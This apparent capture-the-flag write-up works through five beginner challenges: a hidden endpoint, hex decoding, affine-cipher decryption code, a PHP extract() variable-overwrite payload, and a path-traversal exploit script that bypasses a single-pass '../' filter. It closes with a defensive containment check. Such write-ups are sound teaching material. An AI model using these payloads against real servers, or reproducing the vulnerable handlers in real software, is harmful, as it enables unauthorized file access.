1. FirstBlood
<div id="MyInfo" class="reveal-modal" style="display: none;">
<h2>My Information</h2>
<blockquote>
<p>Team Name: Test User</p>
<p>slogan: FirstBl00d</p>
<!-- index.php/user/updatevoice?voice= -->
<p>score: 300</p>
<p>FLAG has been found: 3</p>
</blockquote>
<a class="close-reveal-modal">&#215;</a>
</div>
The HTML comment in the page source gives the endpoint, so visit url/index.php/user/updatevoice?voice=FirstBlood
2. Hexadecimal string
Open the challenge; the hint reads:
This is a hexadecimal string; decode it to find out where the flag is: 666c61675f69735f686572657b32653462313032346137633863353432373139633637613064666333663432302e7068707d
Paste the string above into a hex-to-text converter to turn it into characters.
3. Affine Cipher
Ciphertext: yfsfnhtzlsrftclhwrffonw
In the affine cipher, a = 15, b = 23
Submit the resulting plaintext.
The affine cipher's encryption rule is: c = (m * a + b) % 26
To recover the plaintext: m = ((c - b) * a^(-1)) % 26, where a^(-1) is the modular inverse of a modulo 26
Algorithm:
# coding=utf-8

# Extended Euclid: returns (g, x, y) with a*x + b*y == g == gcd(a, b)
def egcd(a, b):
    if a == 0:
        return (b, 0, 1)
    else:
        g, y, x = egcd(b % a, a)
        return (g, x - (b // a) * y, y)

# Modular inverse of a modulo m
def modinv(a, m):
    g, x, y = egcd(a, m)
    if g != 1:
        raise Exception('Modular inverse does not exist')
    else:
        return x % m

# Euler's totient function
def eular(n):
    count = 0
    for i in range(0, n):
        g, x, y = egcd(i, n)
        if g == 1:
            count = count + 1
    return count

# Affine cipher decryption (lowercase letters and spaces only)
def Affine_cipher(ciphertext, a, b):
    plantext = ''
    # Inverse of a modulo 26
    fa = modinv(a, 26)
    for x in ciphertext:
        if x == ' ':
            plantext += ' '
            continue
        plantext += chr(ord('a') + ((ord(x) - b) - ord('a')) * fa % 26)
    return plantext
Call the function with the ciphertext and the key (a, b) to obtain the plaintext.
4. Variable overwrite
<?php
$filename = 'x';
// extract() turns every GET parameter into a variable, so $filename can be overwritten
extract($_GET);
if (!empty($attempt)) {
    $conbination = trim(file_get_contents($filename));
    if ($attempt === $conbination) {
        echo "<p>neirong" . "$conbination!?</p>";
        require("flag.php");
        echo "<p>congratulation,key is:" . "$flag<p>";
    } else {
        echo "<p>Incorrenr!</p>";
    }
}
?>
payload: url?attempt=&filename=flag.php
5. web.py
def GET(self, filepath):
    # Blacklist check runs on the raw input, before any rewriting
    if filepath.find("flag") > -1:
        return "Hacker"
    # Single-pass removal of "../"
    filepath = filepath.replace("../", "")
    try:
        with open("./uploads/%s" % filepath, "rb") as f:
            content = f.read()
        return content
    except:
        return web.notfound("Sorry,the file you were looking for was not found.")
exp:
from requests import get

def get_flag():
    url = ""  # base URL of the challenge (left blank in the write-up)
    # After the single-pass replace this becomes ../../flag.txt
    payload = url + ".../...//.../...//fla../g.txt"
    flag = get(payload).text
    return flag

if __name__ == "__main__":
    flag = get_flag()
    print("[x] flag :" + flag)
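Why the two checks in the handler above do not hold, next to a containment check that does: this is an added example, not part of the challenge or the original write-up. `naive_filter` reproduces the handler's logic; `safe_resolve` and `UPLOAD_ROOT` are hypothetical names, and the sample file names are constructed.

```python
import os

# Assumed upload directory, matching the "./uploads" path used by the handler.
UPLOAD_ROOT = os.path.realpath("./uploads")


def naive_filter(filepath):
    """The handler's checks: reject 'flag', then strip '../' in a single pass."""
    if filepath.find("flag") > -1:
        return None
    # One pass only: removing '../' can splice the surrounding characters
    # back into '../' and into the blacklisted word.
    return filepath.replace("../", "")


def safe_resolve(filepath, root=UPLOAD_ROOT):
    """Hypothetical hardened check: canonicalise, then require containment.

    Returns the absolute path if it stays inside root, otherwise None.
    The input is never rewritten, so there is nothing to splice back together.
    """
    candidate = os.path.realpath(os.path.join(root, filepath))
    if os.path.commonpath([root, candidate]) != root:
        return None
    return candidate


def compare(filepath):
    """Return (what the handler would open, what the hardened check allows)."""
    filtered = naive_filter(filepath)
    allowed = None if filtered is None else safe_resolve(filtered)
    return filtered, allowed


if __name__ == "__main__":
    # First entry is the payload from the write-up; the others are constructed.
    for sample in (".../...//.../...//fla../g.txt", "avatar.png", "/etc/hostname"):
        print(sample, "->", compare(sample))
```

The containment check is applied to the path that will actually be opened, so it gives the same answer however the traversal sequence was assembled.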